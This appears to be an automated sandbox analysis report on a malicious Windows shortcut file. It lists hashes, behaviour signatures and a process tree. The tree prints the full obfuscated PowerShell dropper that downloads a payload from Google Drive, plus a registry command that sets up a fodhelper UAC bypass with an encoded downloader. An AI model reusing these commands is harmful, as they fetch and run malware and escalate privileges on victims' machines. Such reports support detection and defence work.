08b85c072d8fba2adda8956c1ee3e086370efd8465700fee83aea4aedb4fdc0b

Resubmissions

09/11/2024, 05:12

241109-fvyq9s1mdl 10

26/09/2024, 17:08

240926-vnlkpa1gnd 10

Analysis

max time kernel
176s
max time network
278s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
09/11/2024, 05:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

08b85c072d8fba2adda8956c1ee3e086370efd8465700fee83aea4aedb4fdc0b.lnk
Size

3KB
MD5

58657e9d42041b92fc229395bec9129f
SHA1

6dfd0ba65d061b6cd7b8e1126553a09c85f58878
SHA256

08b85c072d8fba2adda8956c1ee3e086370efd8465700fee83aea4aedb4fdc0b
SHA512

b7d527a70826e5e8813812936ad70b0bab005ee8d793ff3e940cae5aac0b78e21a5d9e9d24f9a3a885b1438d576e72de5838c404f60c5306a501249a03acc2f8

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UUcYiqZwEV_WiJu15EZ3CoLRbDBqVoEg

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1yzIedgOlbPjUc006zFjrkRkJWDbchF0u

Signatures

Blocklisted process makes network request 8 IoCs

flow	pid	Process
4	732	powershell.exe
11	732	powershell.exe
27	2416	powershell.exe
28	2416	powershell.exe
35	3772	powershell.exe
36	3772	powershell.exe
52	732	powershell.exe
54	732	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 3 IoCs

pid	Process
4360	SystemProcessHost.SystemProcesses
2296	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas
3236	SystemSettings.Security

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3772	powershell.exe
732	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
55	drive.google.com
3	drive.google.com
4	drive.google.com
27	drive.google.com
35	drive.google.com
51	drive.google.com
52	drive.google.com

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2296	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 64 IoCs

evasion

pid	Process
2976	taskkill.exe
3348	taskkill.exe
1144	taskkill.exe
1844	taskkill.exe
3228	taskkill.exe
2012	taskkill.exe
1844	taskkill.exe
4004	taskkill.exe
1080	taskkill.exe
2356	taskkill.exe
4976	taskkill.exe
872	taskkill.exe
1492	taskkill.exe
3144	taskkill.exe
2012	taskkill.exe
4592	taskkill.exe
1104	taskkill.exe
520	taskkill.exe
1684	taskkill.exe
1492	taskkill.exe
4576	taskkill.exe
1140	taskkill.exe
1164	taskkill.exe
1620	taskkill.exe
1212	taskkill.exe
1328	taskkill.exe
1636	taskkill.exe
3596	taskkill.exe
2436	taskkill.exe
4936	taskkill.exe
3604	taskkill.exe
3268	taskkill.exe
636	taskkill.exe
3508	taskkill.exe
2452	taskkill.exe
3748	taskkill.exe
4700	taskkill.exe
3020	taskkill.exe
4528	taskkill.exe
1408	taskkill.exe
2572	taskkill.exe
1168	taskkill.exe
3556	taskkill.exe
4276	taskkill.exe
2180	taskkill.exe
3952	taskkill.exe
4464	taskkill.exe
772	taskkill.exe
4544	taskkill.exe
4308	taskkill.exe
1300	taskkill.exe
396	taskkill.exe
2348	taskkill.exe
4700	taskkill.exe
3440	taskkill.exe
4736	taskkill.exe
2356	taskkill.exe
1528	taskkill.exe
3732	taskkill.exe
2436	taskkill.exe
4708	taskkill.exe
4936	taskkill.exe
4052	taskkill.exe
3332	taskkill.exe

Modifies registry class 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\ms-settings	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\ms-settings\CurVer\ = ".alecar"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\ms-settings\CurVer	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.alecar	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.alecar\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.alecar\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.alecar\Shell\Open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.alecar\Shell\Open\command\ = "C:\\Users\\Public\\Music\\SystemProcessHost.SystemProcesses powershell -exEC byPASs -enc JAB0AHMAawBsAHIAZQB4AFIAZwA3AHoAcgBLAFcANABmAFUAdQBRADMAOABmADQAOQB3AE8AdQB0AHgANAA0AGIATAA4ADQAMQBxADcAegA5AHAAQQBEAEcAZwAwAFgAbAA0AFEAaQBuADEARABTAFYATwBPAEQAMgBIAGUASgBkAEsAUwBCAFYAMQA1AGMAVgBOADkANQBLAEsAOAAwADQAMQBZAGEAawBGAHoANgBlAHgAbQAzAHUAOAB2AEQANwBLADgATABPAGcASABHAE4AdwBVAGMAMQAxAGEANQBmADYAMgAwADgAQQBKADMAMABOAEQAYgA1ADMATgAyAHkANgA0AEgARgBEAEQAMgBuAFgANAA3ADEAVwBxAEwAcQA3AEIATQA2ADgAegBIAHkAcgB6AG0ASABWAFIARgBZAFgAOAAzAGQAbAAyAEkAVgBYAHUASQB2ADEAWgBFAEcANQBqAFAAZgBmADMAYQB0AEoAOQBXADkAVABCADQAcgB6ADIAaAA5ADUAMgBSAEEARQA5ADcAaABDAHAAMABnADgAMwB6ADcAQwBuADAANwBqADUAUwA4ADgARQBWAHMANQBnAHIAdgBqADIANQA2AFoAWQBFAEoATQBJADcARABoAGYANwA3AFoAaAA3ADIAOABkAEIAMwA1AG8AUgBPADUAdQAwAE8AUQBXADAANgAyAHcAMwBTAGEAMgBoAFEAOQBsAHkAUQBPAG8AMABYAFkAVQBHAFYAOAA3AHAAVQBZADUAdQBmAGwAQQB6ADAAWgBUAGUAeABKAEkANQAxAHMASgA5AEkATAB3AHUAVQBCAFUAeABWADEANwA3ADkAUQBlADIAZAB0AHYAeAAwAEgAMAA2ADQAMQBLAEYAdwBDAD0AJwBJAG4AJwArACcAVgBvACcAKwAnAGsAJwArACcARQAtAEUAeAAnACsAJwBQACcAKwAnAHIAZQAnACsAJwBTAHMAJwArACcASQBvACcAKwAnAG4AJwA7AHMAYQBsACAAdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAgACQAdABzAGsAbAByAGUAeABSAGcANwB6AHIASwBXADQAZgBVAHUAUQAzADgAZgA0ADkAdwBPAHUAdAB4ADQANABiAEwAOAA0ADEAcQA3AHoAOQBwAEEARABHAGcAMABYAGwANABRAGkAbgAxAEQAUwBWAE8ATwBEADIASABlAEoAZABLAFMAQgBWADEANQBjAFYATgA5ADUASwBLADgAMAA0ADEAWQBhAGsARgB6ADYAZQB4AG0AMwB1ADgAdgBEADcASwA4AEwATwBnAEgARwBOAHcAVQBjADEAMQBhADUAZgA2ADIAMAA4AEEASgAzADAATgBEAGIANQAzAE4AMgB5ADYANABIAEYARABEADIAbgBYADQANwAxAFcAcQBMAHEANwBCAE0ANgA4AHoASAB5AHIAegBtAEgAVgBSAEYAWQBYADgAMwBkAGwAMgBJAFYAWAB1AEkAdgAxAFoARQBHADUAagBQAGYAZgAzAGEAdABKADkAVwA5AFQAQgA0AHIAegAyAGgAOQA1ADIAUgBBAEUAOQA3AGgAQwBwADAAZwA4ADMAegA3AEMAbgAwADcAagA1AFMAOAA4AEUAVgBzADUAZwByAHYAagAyADUANgBaAFkARQBKAE0ASQA3AEQAaABmADcANwBaAGgANwAyADgAZABCADMANQBvAFIATwA1AHUAMABPAFEAVwAwADYAMgB3ADMAUwBhADIAaABRADkAbAB5AFEATwBvADAAWABZAFUARwBWADgANwBwAFUAWQA1AHUAZgBsAEEAegAwAFoAVABlAHgASgBJADUAMQBzAEoAOQBJAEwAdwB1AFUAQgBVAHgAVgAxADcANwA5AFEAZQAyAGQAdAB2AHgAMABIADAANgA0ADEASwBGAHcAQwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAHkAegBJAFAAUABzADgAMgA4AEQARgBTAGQAZwBPAGwAYgBQAGoAVQBjADAAMAA2AHoARgBqAHIAawBSAGsASgBXAEQAYgBjAGgARgAwAHUAJwAnAC4AUgBlAHAAbABhAGMAZQAoACcAJwBKAHUAZAAyAE4AQgBJACcAJwAsACcAJwB0AHQAcABzADoALwAvACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAJwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQAnACcALAAnACcAbwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAUABQAHMAOAAyADgARABGAFMAJwAnACwAIAAnACcAZQAnACcAKQApACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwAnACwAIAAnAGUAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAcABwADgAMwA4ADMAagBuAEQAJwAsACAAJwB3AG4AbABvAGEAZABTACcAKQApACkAKQA="	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.alecar\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\ms-settings\CurVer	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.alecar	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings	fodhelper.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.alecar\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.alecar\Shell\Open	reg.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
1808	reg.exe
4944	reg.exe
2420	reg.exe
4860	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5032	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
732	powershell.exe
732	powershell.exe
2416	powershell.exe
2416	powershell.exe
3772	powershell.exe
3772	powershell.exe
3772	powershell.exe
224	PoWeRsHeLl.exe
224	PoWeRsHeLl.exe
3236	SystemSettings.Security
3236	SystemSettings.Security

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2416	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	732	powershell.exe
Token: SeDebugPrivilege	2416	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeIncreaseQuotaPrivilege	2416	powershell.exe
Token: SeSecurityPrivilege	2416	powershell.exe
Token: SeTakeOwnershipPrivilege	2416	powershell.exe
Token: SeLoadDriverPrivilege	2416	powershell.exe
Token: SeSystemProfilePrivilege	2416	powershell.exe
Token: SeSystemtimePrivilege	2416	powershell.exe
Token: SeProfSingleProcessPrivilege	2416	powershell.exe
Token: SeIncBasePriorityPrivilege	2416	powershell.exe
Token: SeCreatePagefilePrivilege	2416	powershell.exe
Token: SeBackupPrivilege	2416	powershell.exe
Token: SeRestorePrivilege	2416	powershell.exe
Token: SeShutdownPrivilege	2416	powershell.exe
Token: SeDebugPrivilege	2416	powershell.exe
Token: SeSystemEnvironmentPrivilege	2416	powershell.exe
Token: SeRemoteShutdownPrivilege	2416	powershell.exe
Token: SeUndockPrivilege	2416	powershell.exe
Token: SeManageVolumePrivilege	2416	powershell.exe
Token: 33	2416	powershell.exe
Token: 34	2416	powershell.exe
Token: 35	2416	powershell.exe
Token: 36	2416	powershell.exe
Token: SeDebugPrivilege	2436	taskkill.exe
Token: SeDebugPrivilege	4592	taskkill.exe
Token: SeDebugPrivilege	4004	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	2452	taskkill.exe
Token: SeDebugPrivilege	4688	taskkill.exe
Token: SeDebugPrivilege	3748	taskkill.exe
Token: SeDebugPrivilege	3144	taskkill.exe
Token: SeDebugPrivilege	344	taskkill.exe
Token: SeDebugPrivilege	4936	taskkill.exe
Token: SeDebugPrivilege	3440	taskkill.exe
Token: SeDebugPrivilege	3800	taskkill.exe
Token: SeDebugPrivilege	4464	taskkill.exe
Token: SeDebugPrivilege	1844	taskkill.exe
Token: SeDebugPrivilege	1876	taskkill.exe
Token: SeDebugPrivilege	4640	taskkill.exe
Token: SeDebugPrivilege	3584	taskkill.exe
Token: SeDebugPrivilege	560	taskkill.exe
Token: SeDebugPrivilege	4308	taskkill.exe
Token: SeDebugPrivilege	4636	taskkill.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	4684	taskkill.exe
Token: SeDebugPrivilege	1104	taskkill.exe
Token: SeDebugPrivilege	1168	taskkill.exe
Token: SeDebugPrivilege	2624	taskkill.exe
Token: SeDebugPrivilege	3228	taskkill.exe
Token: SeDebugPrivilege	2176	taskkill.exe
Token: SeDebugPrivilege	3604	taskkill.exe
Token: SeDebugPrivilege	1880	taskkill.exe
Token: SeDebugPrivilege	4700	taskkill.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeDebugPrivilege	1212	taskkill.exe
Token: SeDebugPrivilege	4736	taskkill.exe
Token: SeDebugPrivilege	3788	taskkill.exe
Token: SeDebugPrivilege	3716	taskkill.exe
Token: SeDebugPrivilege	4508	taskkill.exe
Token: SeDebugPrivilege	3332	taskkill.exe
Token: SeDebugPrivilege	520	taskkill.exe
Token: SeDebugPrivilege	1140	taskkill.exe
Token: SeDebugPrivilege	2728	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4404 wrote to memory of 732	4404	cmd.exe	83
PID 4404 wrote to memory of 732	4404	cmd.exe	83
PID 732 wrote to memory of 344	732	powershell.exe	89
PID 732 wrote to memory of 344	732	powershell.exe	89
PID 344 wrote to memory of 5032	344	cmd.exe	90
PID 344 wrote to memory of 5032	344	cmd.exe	90
PID 732 wrote to memory of 4860	732	powershell.exe	94
PID 732 wrote to memory of 4860	732	powershell.exe	94
PID 732 wrote to memory of 1808	732	powershell.exe	95
PID 732 wrote to memory of 1808	732	powershell.exe	95
PID 732 wrote to memory of 2092	732	powershell.exe	96
PID 732 wrote to memory of 2092	732	powershell.exe	96
PID 2092 wrote to memory of 4360	2092	fodhelper.exe	97
PID 2092 wrote to memory of 4360	2092	fodhelper.exe	97
PID 4360 wrote to memory of 2416	4360	SystemProcessHost.SystemProcesses	98
PID 4360 wrote to memory of 2416	4360	SystemProcessHost.SystemProcesses	98
PID 732 wrote to memory of 4944	732	powershell.exe	100
PID 732 wrote to memory of 4944	732	powershell.exe	100
PID 732 wrote to memory of 2420	732	powershell.exe	101
PID 732 wrote to memory of 2420	732	powershell.exe	101
PID 2416 wrote to memory of 3772	2416	powershell.exe	103
PID 2416 wrote to memory of 3772	2416	powershell.exe	103
PID 2416 wrote to memory of 4328	2416	powershell.exe	106
PID 2416 wrote to memory of 4328	2416	powershell.exe	106
PID 2416 wrote to memory of 2436	2416	powershell.exe	107
PID 2416 wrote to memory of 2436	2416	powershell.exe	107
PID 2416 wrote to memory of 4592	2416	powershell.exe	108
PID 2416 wrote to memory of 4592	2416	powershell.exe	108
PID 2416 wrote to memory of 4004	2416	powershell.exe	109
PID 2416 wrote to memory of 4004	2416	powershell.exe	109
PID 2416 wrote to memory of 1144	2416	powershell.exe	110
PID 2416 wrote to memory of 1144	2416	powershell.exe	110
PID 2416 wrote to memory of 2452	2416	powershell.exe	111
PID 2416 wrote to memory of 2452	2416	powershell.exe	111
PID 2416 wrote to memory of 4688	2416	powershell.exe	112
PID 2416 wrote to memory of 4688	2416	powershell.exe	112
PID 2416 wrote to memory of 3748	2416	powershell.exe	113
PID 2416 wrote to memory of 3748	2416	powershell.exe	113
PID 2416 wrote to memory of 3144	2416	powershell.exe	114
PID 2416 wrote to memory of 3144	2416	powershell.exe	114
PID 2416 wrote to memory of 344	2416	powershell.exe	115
PID 2416 wrote to memory of 344	2416	powershell.exe	115
PID 2416 wrote to memory of 4936	2416	powershell.exe	116
PID 2416 wrote to memory of 4936	2416	powershell.exe	116
PID 2416 wrote to memory of 3440	2416	powershell.exe	117
PID 2416 wrote to memory of 3440	2416	powershell.exe	117
PID 2416 wrote to memory of 3800	2416	powershell.exe	118
PID 2416 wrote to memory of 3800	2416	powershell.exe	118
PID 2416 wrote to memory of 4464	2416	powershell.exe	119
PID 2416 wrote to memory of 4464	2416	powershell.exe	119
PID 2416 wrote to memory of 1844	2416	powershell.exe	120
PID 2416 wrote to memory of 1844	2416	powershell.exe	120
PID 2416 wrote to memory of 1876	2416	powershell.exe	121
PID 2416 wrote to memory of 1876	2416	powershell.exe	121
PID 2416 wrote to memory of 4640	2416	powershell.exe	122
PID 2416 wrote to memory of 4640	2416	powershell.exe	122
PID 2416 wrote to memory of 3584	2416	powershell.exe	123
PID 2416 wrote to memory of 3584	2416	powershell.exe	123
PID 2416 wrote to memory of 560	2416	powershell.exe	124
PID 2416 wrote to memory of 560	2416	powershell.exe	124
PID 2416 wrote to memory of 4308	2416	powershell.exe	125
PID 2416 wrote to memory of 4308	2416	powershell.exe	125
PID 2416 wrote to memory of 4636	2416	powershell.exe	126
PID 2416 wrote to memory of 4636	2416	powershell.exe	126

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\08b85c072d8fba2adda8956c1ee3e086370efd8465700fee83aea4aedb4fdc0b.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /""W 0""1 ""-Non""Inte""ract""ive ""-No""Prof""ile ""-Exe""cut""ionPo""licy ""Byp""ass $kZ788UmuOaf8KSE4Z2z1X6JZe3y3Vjtpe1NrZt5Y37yS32l2QZY34a0xrE0bgk9Z0CSrya87I46tBE9T37wyHxdL4gcbIRpe35OVT7M8fVtfDmDYctLDm2Bv6Cf0LDl7QioQk4KvVVb4CSA8U6wS61gEWbVMm14jtFYSx4S5i0sFjeC3fd4KF6XtKMek3Iig25iUp7fz9W1PaK650qbQkZx349PFYI7BkF4s2pS56jddf5JEZvV751FiZk17tm0j5A6dp70sFbvpg8hNNw3kI6wI7TCIktLZrXkPMlK8nixxPGN11UIiIf169df177gNe2AfYzFm4='i""Ex';sal uzbekistanac $kZ788UmuOaf8KSE4Z2z1X6JZe3y3Vjtpe1NrZt5Y37yS32l2QZY34a0xrE0bgk9Z0CSrya87I46tBE9T37wyHxdL4gcbIRpe35OVT7M8fVtfDmDYctLDm2Bv6Cf0LDl7QioQk4KvVVb4CSA8U6wS61gEWbVMm14jtFYSx4S5i0sFjeC3fd4KF6XtKMek3Iig25iUp7fz9W1PaK650qbQkZx349PFYI7BkF4s2pS56jddf5JEZvV751FiZk17tm0j5A6dp70sFbvpg8hNNw3kI6wI7TCIktLZrXkPMlK8nixxPGN11UIiIf169df177gNe2AfYzFm4;uzbekistanac(uzbekistanac($($('(n""QNVrd3W""2GjJK36w-oBJQ""NVrd3W2G""jJK36ct sY""stQNV""rd3W""2GjJK36m.NQNVrd3""W2GjJK36t.WQN""Vrd3W2GjJK36bcLi""QNVrd3W2GjJ""K36nt"")"".dos""2Wr6qQRtR""InG(''hfTdH8C6drivz2Wr6qQR.gs97YMGcyg0WCrs97YMGcyg0WCrglz2Wr6qQR.cs97YMGcyg0WCrm/uc?z2Wr6qQRxps97YMGcyg0WCrrt=ds97YMGcyg0WCrwnls97YMGcyg0WCrad&id=1UUcYiqZwEV_WiJu15EZ3Cs97YMGcyg0WCrLRbDBqVs97YMGcyg0WCrEg''.rEpLACe(''fTdH8C6'',''ttps://'').rEpLACe(''s97YMGcyg0WCr'',''o'').rEpLACe(''z2Wr6qQR'', ''e''))').rEpLACe('QNVrd3W2GjJK36', 'e').rEpLACe('s2W""r6qQR', 'wnlo""adS'))))
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:732
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start C:/ProgramData/VipPassword.txt
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:344
  - - C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\VipPassword.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:5032
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.alecar\Shell\Open\command /d "C:\Users\Public\Music\SystemProcessHost.SystemProcesses powershell -exEC byPASs -enc JAB0AHMAawBsAHIAZQB4AFIAZwA3AHoAcgBLAFcANABmAFUAdQBRADMAOABmADQAOQB3AE8AdQB0AHgANAA0AGIATAA4ADQAMQBxADcAegA5AHAAQQBEAEcAZwAwAFgAbAA0AFEAaQBuADEARABTAFYATwBPAEQAMgBIAGUASgBkAEsAUwBCAFYAMQA1AGMAVgBOADkANQBLAEsAOAAwADQAMQBZAGEAawBGAHoANgBlAHgAbQAzAHUAOAB2AEQANwBLADgATABPAGcASABHAE4AdwBVAGMAMQAxAGEANQBmADYAMgAwADgAQQBKADMAMABOAEQAYgA1ADMATgAyAHkANgA0AEgARgBEAEQAMgBuAFgANAA3ADEAVwBxAEwAcQA3AEIATQA2ADgAegBIAHkAcgB6AG0ASABWAFIARgBZAFgAOAAzAGQAbAAyAEkAVgBYAHUASQB2ADEAWgBFAEcANQBqAFAAZgBmADMAYQB0AEoAOQBXADkAVABCADQAcgB6ADIAaAA5ADUAMgBSAEEARQA5ADcAaABDAHAAMABnADgAMwB6ADcAQwBuADAANwBqADUAUwA4ADgARQBWAHMANQBnAHIAdgBqADIANQA2AFoAWQBFAEoATQBJADcARABoAGYANwA3AFoAaAA3ADIAOABkAEIAMwA1AG8AUgBPADUAdQAwAE8AUQBXADAANgAyAHcAMwBTAGEAMgBoAFEAOQBsAHkAUQBPAG8AMABYAFkAVQBHAFYAOAA3AHAAVQBZADUAdQBmAGwAQQB6ADAAWgBUAGUAeABKAEkANQAxAHMASgA5AEkATAB3AHUAVQBCAFUAeABWADEANwA3ADkAUQBlADIAZAB0AHYAeAAwAEgAMAA2ADQAMQBLAEYAdwBDAD0AJwBJAG4AJwArACcAVgBvACcAKwAnAGsAJwArACcARQAtAEUAeAAnACsAJwBQACcAKwAnAHIAZQAnACsAJwBTAHMAJwArACcASQBvACcAKwAnAG4AJwA7AHMAYQBsACAAdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAgACQAdABzAGsAbAByAGUAeABSAGcANwB6AHIASwBXADQAZgBVAHUAUQAzADgAZgA0ADkAdwBPAHUAdAB4ADQANABiAEwAOAA0ADEAcQA3AHoAOQBwAEEARABHAGcAMABYAGwANABRAGkAbgAxAEQAUwBWAE8ATwBEADIASABlAEoAZABLAFMAQgBWADEANQBjAFYATgA5ADUASwBLADgAMAA0ADEAWQBhAGsARgB6ADYAZQB4AG0AMwB1ADgAdgBEADcASwA4AEwATwBnAEgARwBOAHcAVQBjADEAMQBhADUAZgA2ADIAMAA4AEEASgAzADAATgBEAGIANQAzAE4AMgB5ADYANABIAEYARABEADIAbgBYADQANwAxAFcAcQBMAHEANwBCAE0ANgA4AHoASAB5AHIAegBtAEgAVgBSAEYAWQBYADgAMwBkAGwAMgBJAFYAWAB1AEkAdgAxAFoARQBHADUAagBQAGYAZgAzAGEAdABKADkAVwA5AFQAQgA0AHIAegAyAGgAOQA1ADIAUgBBAEUAOQA3AGgAQwBwADAAZwA4ADMAegA3AEMAbgAwADcAagA1AFMAOAA4AEUAVgBzADUAZwByAHYAagAyADUANgBaAFkARQBKAE0ASQA3AEQAaABmADcANwBaAGgANwAyADgAZABCADMANQBvAFIATwA1AHUAMABPAFEAVwAwADYAMgB3ADMAUwBhADIAaABRADkAbAB5AFEATwBvADAAWABZAFUARwBWADgANwBwAFUAWQA1AHUAZgBsAEEAegAwAFoAVABlAHgASgBJADUAMQBzAEoAOQBJAEwAdwB1AFUAQgBVAHgAVgAxADcANwA5AFEAZQAyAGQAdAB2AHgAMABIADAANgA0ADEASwBGAHcAQwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgB